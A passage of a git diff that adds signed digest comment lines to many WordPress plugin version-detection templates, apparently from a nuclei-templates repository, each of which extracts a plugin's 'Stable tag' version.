b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207a5be0f8d488a5218c14866a338df2448e550922277a63646d6558a382b3f52302202770cc1193758792312b7e9c46e0e5b3f53f6677170c942705d6a8fe00ae7a12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ace..c0b4d471f6a 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100856e30449bcf8c2270d7fddffc9265eb7a7c52b6708f29e193a6cbc97acbad00022100cde8b4323cb87e74b61716b42ca67d08e1b459c864328ed8ed0734cc499641d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736fd..f8c5d999856 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220674296ba3b413e9ac4bc2f53bbd6bd84498dc72fc902021c1fa31297365041420220307ca9760db7d79fc8fefc9613d8790582714d3415733f54521017223ace5af5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b24789..55775618417 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022066f47bf155f0a61d613ce4527ebf765a6b6cd7d1263053a1e19aed0337245849022036e8133d318d023222b700f082281b29376bbbd9795aa74dd58e2c3943c27224:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6d..99e7f54fb01 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022053b712332c6a17372c4e4c2429804460c0d60983768b00ab15160e82fc0bafc00220102a22621412f594e9bfdb6704ab13ec51a5e87aa98b8bd4f543da04d6aafad5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d578..64bf3e4ff53 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c363a4777bf7de3c8ac0ac49bd1ff010a71e75ab0526b3139f0f99be51ea5c510220472e9a8b1eb4e17821a3d02984653eed6b0c2891add292f2ff7a898571e8ac0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a90..ff37d827ceb 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bc1214b926fcdce8bd4b3be920745258132de22d8b278b5b259fe60191e5bdf6022100ee23f9d08da6d70aa8b43d1174473c6f50a0d92a05ebadeb52920042e7de5271:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415d..c4f6e37ba28 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022050534122bf8436e12397ce8321323120bccda73a592c22e2ddb376b32649bc09022100da621ce9ac76ee869527ccd2c26c39129ba0cac73c2939ccbc3167a409ae6cd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d2..e849ae672ac 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220328cb9ff0f8010583a1c709cfda57969f1ff4cf02be3204259213182aa29097b022014381bb2a9cd30dfbc93c0029aa68e594c6530dd73079df76841bbeffc273af7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03c..26504186781 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220659f3b15197085fe67e165e3a459c7aa05b3c1de3088a9c4f47e712dc5c50537022100be59ac7af2a95d5535e06762c260073125e62a1f228d34c5888eb5277fcedd00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9c..8cb34f17122 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f327e5ec0b3d9e68658605b0b453e4f6b14808f6e7b2f8ec5cdff2ae90efd5dc022014578637d4d2ec9259d0599701b2cc6fe039d25871feeb9c8e9e4aa20a5bedc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc670..56faa963dcf 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008589d1aae19b56791ce5bc70dbf22425e64a85f611bb2f26f9248c9a59f1b0bb022100b0119257c103bad8d81a35abeac0b2c38408551eaf932e48e7bbd0e3d6995ab3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde5..fd5eca6efc8 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fb03c21390a02b0ae4f40a425839122b4ed652ba55d751f00b6725def1488a33022017e3825d9bc6756c6f7f80091034a46c8877fa1080f8d1d8f176479e37f1501f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7d..de1b1a6259b 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c080f3ba053dfe914f01cac260418d77338ee431bcf44f23b4fa5ec6c92ea77c022023243d159639b5adfd3a7e8dadeee0da0aa18bcec13c7fc9e07c0f585e71caf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea24..24a0d0b972b 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b550d88ff0c2a7fe812b09cf496e8895fcdadd9019b0028690306696b6cc05c1022100ea4f611a03192117113c189a0186a8784698af06fe0bdc47eb2d4be7b140bfb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c7..417c4b753cd 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022001268a8155228d28456c0f9ef4be3e9d2fef3d8069bdd8f0362781947317910402203b341d8932d201bf9e253dff5b0d9bc8e4523c72ea9a2b601c3fc05767137596:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f64..2bcb21f357a 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200474526d53d6a55aa692e0778be891e532465de11337427dc0f33a4226c840e5022100cd61d7076854216876a1b2b86e183fded17b95d6d38b649a914619c612e70232:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff4..387962c5871 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022027d00990bf60a758c42300b3b2cb9030dbeeac240dc86880444fadd3790d0a720220517163c8b542a91ca10fb273d731cb2fd4c96174caddf288d2b7f22e960cc66c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1c..26b2d3560c7 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022069cd527c2959bdfca7754c3d0d9058f12be483ea83c6d94935edd13360182dc2022100f3e4b3f63ba043290ca2112bdd7bf083652c68eaed0fba70af533346cd975a40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751b..f5658d21932 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203380a395d21423bd7e4f6d210a65b112383b713536f817c9f02016360fae4f900220150d3c5119fe0bc253c881504c75b1c41cd9bbaced50ffa7be3c0c34db26252f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e47..f710d55c61e 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022019fcade195804318fb3cae62b23dfbc0c266e8c89877a01cc6fdc3cd23130636022062376848d6e2dcda093738c90cb3587a89959f7f4d4bcf5c9547753c3709244b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb76..0cb5ff31cc0 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022047591fb9b5e6d02d68dd974015b945979a5cbf5a8af40f90373098e936f2f84602205ea1f5a0b909a8d7a0a72c8d712b0bed9cb397dd6c81a15984ccbfd0d0abea96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e49..8d2de6afdc8 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220585826e501c52addd57a80749c62aecf2771a4d9a5509b39d225c3d282b96ceb022100c1c7fd22b9e1dd2563208facd2e5dcb84e9e8fbe96f5b32b04e3d768f3f534c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283de..5562789db66 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cac128f93ab2a0af1d2b171dbb19ed807ad24ad734cd0f172f662e4ed2ff032702200b7730205e9885388010467e8bfd6e08fb6e6313e594218046427975a05abf55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3e..4544ab56be3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009708159ed6d4335255d8bd75179fb075f5c74eb5fd6b94e415f936f7eb5c01e10220277b3557715644694504b1086eae7632d8bec9d9f4bdb13872820c1987c9a362:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd44..9e7e469e4d3 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100abbd4c45a0eead187c7c9c8749de488de68bfa80c7db55f2f2309ef3010a403b022100ba3b9a0f73945d823161a9f92924c9ef0da942dcfa039ef351fe99408145b5dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74c..f684144e28c 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022043916162dcbb7ec1037686a0674b0e74103a99219b790a8c9c1142d98bbe972e022100cffea2799f8c5b12c06df34658477bc13d57f68b4046a086c8596c8b7804d080:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074c..b9e78bc0c97 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207d279e60e1630c929e3dbe927c7e1889c09bf9e77d9632a97aa1c30ff322a080022100e11f77a0cc80220fc8848865a8b6e679208e33f6c105d6e74bcf9c684b2f192f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5eb..3f35c7a21de 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c11331d52e40784aa14b7d131fec0abe61a0be72fb0bb1c28ece8668e6c6254102204a12f51cd5277a43289711d6c270ef80f3247368856f1d1b51fe8542d83501c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae30..cfb03963c0f 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220724cc4a28fdc2276856db3d1e9fd9aa00365f7d363b295773cac1fe6d2405729022065080102dc9dc613cae9a78af31a04e4c8ffed272a87283b0c05fdaaebdd41ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27a..72d0ad262b0 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dac6afe6525dafb4ae90db8cbabaac1912bbf1b2b8407974de674bf1b882409f02202102b5e065d07ca8faffb4eaf712175b64fff9940196d0f11ca8206a40b6c5dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f047..c9d763a5ec1 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cd5d5682f58b6e96defb10693dc7171d531d131b77a58db4600a1cd66482aa44022100b7390f7a32f3258fca1a6c612d0c0630f889216f0e870a11d4366f236a2dd352:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f5..83cfe8a597d 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f2c348791e669750175494451364029547f7d165045021d4f578f056cd6ec1af02203f982be3e73274e85ce0a91c1603c0a549f13976f6dc33cc5c5829fa3c7e2767:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea697..1cc21593b27 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022019791e8499c4431581c69f22b064701625d5dd73715b51935681023a28c3ffc902207a7402a359a2b147e9d08659ad9b3658906f013ab04ae23203819a68c46df46b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce85..df53cd6e494 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a65a6c8a1264a89a2e97a76dc9c1d9bf4202370a7e810644a4ae80bbb5a4cbe5022066422ce85b9cb08fafed713f5af65dd099ddab280e85dde9aed419cada1e8418:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1c..9e4adfa5c84 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a74c1ec6247d18be9ae88fdbf8ade365ef2ea187156a30d6f05a6186e6e617600220479de4e97099e2ae5377dda47eb439c69053c8985712789628ad7ede51acd9bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2b..80fcb5d9cd5 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b71d99347cad40bcd0a68f16bdb950d2b87b61d089e9609c0b99f086268452c502210099e97f75f151b0482d15ba8e81b73a8d8604bec15ca07304c37fcee03692232d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0c..38e8ef29cb2 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ba6b54e7a2c6c5fb6e50f2ac132b97793342af07fa21fc70f357e72f88f975b402206eabb1ae7811d6b6cc467e2ac79bc413d16b00e45c4f9345afb6dfc974762106:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca7..07aff9a14bf 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d421769f143d3e8b223166aa2cd15f6e66796429e92ff0f28baf4d0ca6190b9e02206f15df3c6b894bb3424542e0d81055c6f36f2598b01e8fb8f7e81b3705e16e99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5dfe..cecb6e406cb 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202095ae21ae000f943302dae2b164e0d515ec2f824761f97334d78fee154ddab50220596e0f2b656412ae33a8802bf95e667fbb71170d759494cad4568b3f07072700:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f7..66a2e7895ff 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b7b3818de2a199603d28dd8e28c3b0f72d3863fec46b221c3c61533d2ae28665022100d9b6bd1c8f07f42b0b62640b61cd5ef959a6550a2db6be25e1d8d3f4513b7be3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e7..ada0b79d905 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c7a12ab59ec092156811cd2c1d04764c194a289508dda2e817d711030ff1cece02204b26ee87675a3af9cd27c9d35c88098ba6f87dbd6f7a573515b5b2feffed76fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e3..24f70897b7b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210086ef9ddd2d6ca0635b7d04a7ba28924e6eca809ea70b1bba7049360d9c589d10022100866f7e1f4e66779767e8016a421929e93660edebd6a2fa5c50334f92691002d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4fa..2d37b28baad 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022002e95b8f937b9b4fa3c8fb1c58bb8bea8c3235a73baacca5f9d2b0e747125e67022100ea8e59fa3c9a2cef1d6b1e4ef332e54a08c054e8a256acc32fe052805154ccf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e9..35e9da5f683 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d2917db74300aa01becfddd880c3886b81f46d6aba1fb3ad3c3b841d1f909e2602200f4c4734a4c6f90617f83f1ac253101daf9dfc948fd260b12f8efe6bb295c602:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f96..5365dd79589 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ad7ebb9ff7c226176020665a2bce9babb8c5f612f0ec042145adcd361d0e52e50220520b44a88a86bd6ec9c958f2f352a7fbc08093f2ba63c01619988100a9aebf21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a27..9d8d807e95d 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009de938022a8653834e9d75719373bb65b6c6d6a761497321944cc4d2fe3ccb9302204bfa65c6b953e43d91e3fc09d52344cbeadcfede7ad249a2a3f41efe68cf7fd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e45..273aca0c163 100644 --- 